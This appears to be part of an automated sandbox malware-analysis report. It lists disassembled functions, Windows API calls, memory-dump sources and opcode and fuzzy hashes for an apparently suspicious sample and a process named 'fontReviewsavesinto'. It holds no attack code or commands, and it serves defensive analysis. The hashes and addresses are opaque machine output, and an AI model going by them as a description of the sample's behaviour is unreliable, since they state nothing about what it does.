                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: __vswprintf_c_l_swprintf
                                          • String ID: %c:\
                                          • API String ID: 1543624204-3142399695
                                          • Opcode ID: 76dc2d6a1f1bf7dd9e90a39a4c6c5f7dd68908b785221cc689e4dd244e5fa816
                                          • Instruction ID: cd27fa9a1d2616de7123c8f912535770cac09cfee44c2913c723e859354c88ce
                                          • Opcode Fuzzy Hash: 76dc2d6a1f1bf7dd9e90a39a4c6c5f7dd68908b785221cc689e4dd244e5fa816
                                          • Instruction Fuzzy Hash: 7D01F56390031269DA347B398C86EABB7ACEF92770B40440AF945D6182EB28D844E3B1
                                          Function 00F9101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateThread.KERNEL32(00000000,00010000,00F91160,?,00000000,00000000), ref: 00F91043
                                          • SetThreadPriority.KERNEL32(?,00000000), ref: 00F9108A
                                            • Part of subcall function 00F86C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F86C54
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: Thread$CreatePriority__vswprintf_c_l
                                          • String ID: CreateThread failed
                                          • API String ID: 2655393344-3849766595
                                          • Opcode ID: 14255ad3a2a9c2a98eb1bf25730a17e5aa2ef52e5a1f047bc60c6378b5e3321d
                                          • Instruction ID: de1a663ec03ff60e65427c82fcf1e7caf4ed53b270586d7d3a19a598ab53bd93
                                          • Opcode Fuzzy Hash: 14255ad3a2a9c2a98eb1bf25730a17e5aa2ef52e5a1f047bc60c6378b5e3321d
                                          • Instruction Fuzzy Hash: 8D01FE7538430B7FE7306F649D52FB67398FF41751F10003DF68692291CAA1A8957724
                                          Function 00F81316 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00F8E2E8: _swprintf.LIBCMT ref: 00F8E30E
                                            • Part of subcall function 00F8E2E8: _strlen.LIBCMT ref: 00F8E32F
                                            • Part of subcall function 00F8E2E8: SetDlgItemTextW.USER32(?,00FBE274,?), ref: 00F8E38F
                                            • Part of subcall function 00F8E2E8: GetWindowRect.USER32(?,?), ref: 00F8E3C9
                                            • Part of subcall function 00F8E2E8: GetClientRect.USER32(?,?), ref: 00F8E3D5
                                          • GetDlgItem.USER32(00000000,00003021), ref: 00F8135A
                                          • SetWindowTextW.USER32(00000000,00FB35F4), ref: 00F81370
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                          • String ID: 0
                                          • API String ID: 2622349952-4108050209
                                          • Opcode ID: 20bae141d33e5ffe32b4fab1fb25c0d69a3e9804ae2e0410931c109a01d3b994
                                          • Instruction ID: a480784c14cf44e8661687ddc8fe33d5910b0c3981bdecab1cf123c768df931a
                                          • Opcode Fuzzy Hash: 20bae141d33e5ffe32b4fab1fb25c0d69a3e9804ae2e0410931c109a01d3b994
                                          • Instruction Fuzzy Hash: 0AF04F30A4438DABDF152F608C0EBEA3B5DBF45354F048618FC86555A2CB7AC996FB50
                                          Function 00F90FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                          Download Yara Rule
                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,000000FF,00F91206,?), ref: 00F90FEA
                                          • GetLastError.KERNEL32(?), ref: 00F90FF6
                                            • Part of subcall function 00F86C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F86C54
                                          Strings
                                          • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00F90FFF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                          • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                          • API String ID: 1091760877-2248577382
                                          • Opcode ID: e09545d369ceaa5d48c0cc74f0a518bcf56d7e780c4191925e7def4c6aa5046e
                                          • Instruction ID: 5acfb56b5adaacb301db9eeef4d8d89a03162693791e6274be77fcd0579ccc52
                                          • Opcode Fuzzy Hash: e09545d369ceaa5d48c0cc74f0a518bcf56d7e780c4191925e7def4c6aa5046e
                                          • Instruction Fuzzy Hash: 1ED02B3194813536DA1033245E46DAE3804AF13332F140714F038901F7CA2549917B92
                                          Function 00F8E29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000,?,00F8DA55,?), ref: 00F8E2A3
                                          • FindResourceW.KERNEL32(00000000,RTL,00000005,?,00F8DA55,?), ref: 00F8E2B1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: FindHandleModuleResource
                                          • String ID: RTL
                                          • API String ID: 3537982541-834975271
                                          • Opcode ID: 80d3da9717ddaf28af0f0cbae417bf92d99dfba8264f61e5879000f9b79268d7
                                          • Instruction ID: 21b720da68674637eb029da6c930cef1c0b2eb319a2dda09e0ce177e051b1840
                                          • Opcode Fuzzy Hash: 80d3da9717ddaf28af0f0cbae417bf92d99dfba8264f61e5879000f9b79268d7
                                          • Instruction Fuzzy Hash: 8FC012316C471066E63037656C4DB837A5C5F01B55F050548B181E91D1D6A5D540ABA0

                                          Executed Functions

                                          Function 00007FFAAC3D0D48 Relevance: 1.5, Strings: 1, Instructions: 256COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1341437272.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_7ffaac3d0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 5[_H
                                          • API String ID: 0-3279724263
                                          • Opcode ID: 7dec9d9baf1ef2d3f3f30b42a2e55cb481e147b8e691bef5d8655534e3960821
                                          • Instruction ID: 309ed2b643ff4a2ef5edfea92d0d5225b212eda150b3e994e56804834ad98cd8
                                          • Opcode Fuzzy Hash: 7dec9d9baf1ef2d3f3f30b42a2e55cb481e147b8e691bef5d8655534e3960821
                                          • Instruction Fuzzy Hash: 5F91F1B5918B9D8FE749DB28C865BA9BFE0FB96300F4044BBC04ED73E2CA7858058740
                                          Function 00007FFAAC3D090D Relevance: .2, Instructions: 154COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1341437272.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_7ffaac3d0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2f49b20f208c073dd0efc1ca931695e73147f42a7af843b582dacf18501d53f4
                                          • Instruction ID: 5ba0050b035efae711ef668fb432dd285a16e6ca6efd94c08170c62a78e32a8b
                                          • Opcode Fuzzy Hash: 2f49b20f208c073dd0efc1ca931695e73147f42a7af843b582dacf18501d53f4
                                          • Instruction Fuzzy Hash: 2C416E5260EA561EE305B37CA0AAEF9BB91DF45361B1848BBD44EC71E3CD14E88282D1
                                          Function 00007FFAAC3D0908 Relevance: .1, Instructions: 118COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1341437272.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_7ffaac3d0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7de3e90215e5ef9b36b68d21ee94634a7601b8ade4ea91bb2df532ffec5ec4f4
                                          • Instruction ID: 9bb1501a9ecd158aab566c92b000d30a97c1723cebd4355dce808ef4ae5c41b3
                                          • Opcode Fuzzy Hash: 7de3e90215e5ef9b36b68d21ee94634a7601b8ade4ea91bb2df532ffec5ec4f4
                                          • Instruction Fuzzy Hash: D321E63130DC184FE768EB0CE889EB977D1EF9A32130145BAE58EC7225E911EC9287C1
                                          Function 00007FFAAC3D0960 Relevance: .1, Instructions: 117COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1341437272.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_7ffaac3d0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3c425413ee1f0d9a9badfdde531413d7b48d9708835d2ace9e78017cd91b468b
                                          • Instruction ID: e6283a08bcb53cfd963331ec1ceecc2241ee6927c17d4d9186b886f2d9535733
                                          • Opcode Fuzzy Hash: 3c425413ee1f0d9a9badfdde531413d7b48d9708835d2ace9e78017cd91b468b
                                          • Instruction Fuzzy Hash: D6313951A0EA5A1EF345737CA05AEF977D1CF49361B1488BAD80EC72F3CC28EC824295
                                          Function 00007FFAAC3D0998 Relevance: .1, Instructions: 106COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1341437272.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_7ffaac3d0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 17b222c6bab1ab2e6b57ff4cd812892650b2bdf086dcefcd4906a7860bc1416f
                                          • Instruction ID: af19c0ed5f2f455653ccd40fd7d1b44d0edd9ab8dd63cef279a7c4f4771d9b8f
                                          • Opcode Fuzzy Hash: 17b222c6bab1ab2e6b57ff4cd812892650b2bdf086dcefcd4906a7860bc1416f
                                          • Instruction Fuzzy Hash: BF21FC2171AD594FE749B73C844ABBA7BD2DF59351B1444BAD84EC32E3CC24DC428291
                                          Function 00007FFAAC3D1171 Relevance: .1, Instructions: 93COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1341437272.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_7ffaac3d0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2c063402353c355be23a6267e84b526fba18340e849f7ae96ef8cb4680ffaffe
                                          • Instruction ID: 3239a03d547604666a73633fe40b60b0adb7c71f464da0029f37bdbff4898440
                                          • Opcode Fuzzy Hash: 2c063402353c355be23a6267e84b526fba18340e849f7ae96ef8cb4680ffaffe
                                          • Instruction Fuzzy Hash: 1931863190DA8A8FEB46EB64C855EB97BF0EF57310B0445BBC00ED71A3DA28D849C791
                                          Function 00007FFAAC3D0C25 Relevance: .1, Instructions: 85COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1341437272.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_7ffaac3d0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c25278c873f2cc5f61e8b7463601b79380bc1fa619b382061b3c5a57515bb050
                                          • Instruction ID: 9932097982cbed0d7f63f91e5290fd45f9e41cfe6409a49247c8ea3b2bd7e258
                                          • Opcode Fuzzy Hash: c25278c873f2cc5f61e8b7463601b79380bc1fa619b382061b3c5a57515bb050
                                          • Instruction Fuzzy Hash: 7121F76590E745CAF312A778A851AEC7B60DF82721F1489B7C04D8F1D3D938A58A87A1
                                          Function 00007FFAAC3D6369 Relevance: .1, Instructions: 63COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1341437272.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_7ffaac3d0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 32cd02d791acdbfef076f4d221866a3e375d0518c0df169f1cb4191a5f2be13f
                                          • Instruction ID: a9661317f7b0bcd80ef98722ea68ab7687b5da82a84001ffa50789bc2e2a8298
                                          • Opcode Fuzzy Hash: 32cd02d791acdbfef076f4d221866a3e375d0518c0df169f1cb4191a5f2be13f
                                          • Instruction Fuzzy Hash: 2621EC74908919CFEFA5DB08C854BA9B3B1FB98311F5489AAC00EE7291CE35E985CF51
                                          Function 00007FFAAC3D0C38 Relevance: .1, Instructions: 57COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1341437272.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_7ffaac3d0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4c0cabfe430dff5ae1e6b0de673d48835b126c27313cadcf6faf28f2e56707f1
                                          • Instruction ID: bc0e607df46c574471fba5ff9f0a5a703cf35fbcb30ae7865093e6fdf337ebbd
                                          • Opcode Fuzzy Hash: 4c0cabfe430dff5ae1e6b0de673d48835b126c27313cadcf6faf28f2e56707f1
                                          • Instruction Fuzzy Hash: 5B11C475A0DB49CFF702EB64945069CBFA0EF42611F0489B7C048CB192D534D54987E0
                                          Function 00007FFAAC3D0C40 Relevance: .1, Instructions: 51COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1341437272.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_7ffaac3d0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 93ef1f9fe511bfc3a81d8f7524fbd7bc32ec7599322d1ef47a40200b7655b653
                                          • Instruction ID: 996b2568bff1555d7cd391181d01fd44e85327c4a934ee453d1188bd40fc0603
                                          • Opcode Fuzzy Hash: 93ef1f9fe511bfc3a81d8f7524fbd7bc32ec7599322d1ef47a40200b7655b653
                                          • Instruction Fuzzy Hash: 0711C27590EB89CFF702EB64945069CBFB0EF42711F0489B7C049CB292D534D5498790
                                          Function 00007FFAAC3D17E0 Relevance: .0, Instructions: 46COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1341437272.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_7ffaac3d0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b82b91b7b6e9f70b143448d91c219cb0a407df250dad30f4503e0a15df51da5c
                                          • Instruction ID: f28371f642aabf144f152520110fc696542aee71d654dee5e703467b0a3fc592
                                          • Opcode Fuzzy Hash: b82b91b7b6e9f70b143448d91c219cb0a407df250dad30f4503e0a15df51da5c
                                          • Instruction Fuzzy Hash: 0D011E21B09D06CFFA56E718C494BB8B392EF96710F058976D50EC72A2DD28E8454690
                                          Function 00007FFAAC3D0C48 Relevance: .0, Instructions: 45COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1341437272.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_7ffaac3d0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fb646e0ef3ceecbe7e7bde7ab3eb5283c0a7cb185ece280cdeba02f6c174342c
                                          • Instruction ID: e50fdae24dfbbadad3dc86379cbea9a01398f8e25ab1f5038f15f45b839a5fb6
                                          • Opcode Fuzzy Hash: fb646e0ef3ceecbe7e7bde7ab3eb5283c0a7cb185ece280cdeba02f6c174342c
                                          • Instruction Fuzzy Hash: 4C01AD7190E789CFE702EB64885069CBFB0EF02710F1485A7D049CB2A2D9389A498790
                                          Function 00007FFAAC3D179A Relevance: .0, Instructions: 40COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1341437272.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_7ffaac3d0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0325a1ae18a3fb8657ff01c7e218e2a46f6257fffb43f1ad919698442902a8c0
                                          • Instruction ID: 98730b6e64dc2e946ed191ddb77538ec0b5b1824eeac3db40616ab4550003704
                                          • Opcode Fuzzy Hash: 0325a1ae18a3fb8657ff01c7e218e2a46f6257fffb43f1ad919698442902a8c0
                                          • Instruction Fuzzy Hash: D9016760D2DD1ACFF693D7188504BF9E192BF45710F5489B6C50DE3192DE38EC4546D0
                                          Function 00007FFAAC3D0C50 Relevance: .0, Instructions: 40COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1341437272.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_7ffaac3d0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: be25b3d1eb654f7cf1435a1deac66f352d656a975c3fc8a9b41725202b9b93cd
                                          • Instruction ID: e29d6136af5bbb66686a572817d76d5d5042d83d1c8baa4ce64439245bcce758
                                          • Opcode Fuzzy Hash: be25b3d1eb654f7cf1435a1deac66f352d656a975c3fc8a9b41725202b9b93cd
                                          • Instruction Fuzzy Hash: E9015E7490E789CFE716EB648854A9DBFB0EF02711F1485E7D049CB292D938DA488791
                                          Function 00007FFAAC3D1855 Relevance: .0, Instructions: 35COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1341437272.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_7ffaac3d0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 944d61059a31b9d1bed6d9e5f52998de1cd7260d907c3be5c091df8252c536d2
                                          • Instruction ID: 44bec5ebcfd759d6f10a63334026423c4186354c9f05bf20abb0ddf17a8dcbe1
                                          • Opcode Fuzzy Hash: 944d61059a31b9d1bed6d9e5f52998de1cd7260d907c3be5c091df8252c536d2
                                          • Instruction Fuzzy Hash: 0CF01D31D1990ACFFB56EB04C884BF9B362EB81320F1485BAC40ED3191CE38E9858790
                                          Function 00007FFAAC3D1828 Relevance: .0, Instructions: 30COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1341437272.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_7ffaac3d0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0de71fa158804eddedc676ebcaec681e313a07634ba3b1218b1e4fc123e68bbd
                                          • Instruction ID: 4deadd4ed932f86eed031e5e7cd3b432bc82357b599c4c56234a235f206c7176
                                          • Opcode Fuzzy Hash: 0de71fa158804eddedc676ebcaec681e313a07634ba3b1218b1e4fc123e68bbd
                                          • Instruction Fuzzy Hash: C5F01221A1D806CBF656D704C844BF97353EF82320F1485B6C50D931D1CE28E98546D0
                                          Function 00007FFAAC3D2810 Relevance: .0, Instructions: 21COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1341437272.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_7ffaac3d0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 365a92b40fae61960c29256a7ed6e6cdfc8762340f1baa663a446c15420b1b07
                                          • Instruction ID: 5c09bad78b2510fd3f94b746d9e9a71b1e0ac34573b3c8633754b0ffd911a676
                                          • Opcode Fuzzy Hash: 365a92b40fae61960c29256a7ed6e6cdfc8762340f1baa663a446c15420b1b07
                                          • Instruction Fuzzy Hash: 46E0ED70D0D81ACBF7A5A714D851BF9A191DF95310F1084B6EA4D932D2CD38EE858BD0
                                          Function 00007FFAAC3D6BFD Relevance: .0, Instructions: 20COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1341437272.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_7ffaac3d0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 50da1873461d80104cfe354517d7debd443e2d938b7cc394f2ac5dd70f5273ec
                                          • Instruction ID: 125530b879b2d853e6b409f345c8ed4156709c4d2bd2061f254e882778adf05d
                                          • Opcode Fuzzy Hash: 50da1873461d80104cfe354517d7debd443e2d938b7cc394f2ac5dd70f5273ec
                                          • Instruction Fuzzy Hash: 22E0C291E4CD018AF399A7A84422BBCD0C1DB86740F08C57EA44EC32C3CC089C4403E2
                                          Function 00007FFAAC3D0B95 Relevance: .0, Instructions: 19COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1341437272.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_7ffaac3d0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 10c668cf3558eab0feaac669ddaf96801f5b5ddbe6e33897a242e6e9f1e9bcf0
                                          • Instruction ID: 566aeea5899a1a3b8e4ca9730a7340b4d87584276b22dea0aa3e1dd64e6d6c50
                                          • Opcode Fuzzy Hash: 10c668cf3558eab0feaac669ddaf96801f5b5ddbe6e33897a242e6e9f1e9bcf0
                                          • Instruction Fuzzy Hash: 18D0A73061994E9FE601B77CD889854BBA0EF1F210BC914E2D00CC71A1D50488558740
                                          Function 00007FFAAC3D12B8 Relevance: .0, Instructions: 14COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1341437272.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_7ffaac3d0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0ba637a91a6ab8ac21ddc5e4d32457aa27138c0be0db51b66355bf03e48b19e3
                                          • Instruction ID: 90715a6debf61a52809706aff22fc761cee9feb04fb0946c4316911eb08a8a29
                                          • Opcode Fuzzy Hash: 0ba637a91a6ab8ac21ddc5e4d32457aa27138c0be0db51b66355bf03e48b19e3
                                          • Instruction Fuzzy Hash: DCC01230511C0C8FDA48EB29C884E14B7A0FB1A304B9940D4E40DCB2A1D62AECC6CB81
                                          Function 00007FFAAC3D06A5 Relevance: .0, Instructions: 13COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1341437272.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_7ffaac3d0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 21db906594d11b7f137e5e5be94e44b845d8a9737c8d5e68687420ea240c9870
                                          • Instruction ID: 445b61fab2792e4b95ce5c43ccc0ca7cb73159c3c2f2999b39df1d85df0f1baa
                                          • Opcode Fuzzy Hash: 21db906594d11b7f137e5e5be94e44b845d8a9737c8d5e68687420ea240c9870
                                          • Instruction Fuzzy Hash: 73C01200E0BC0A81B402376A1406AACE100DBC6A10FD08833E00C80081D80DE08D01FA
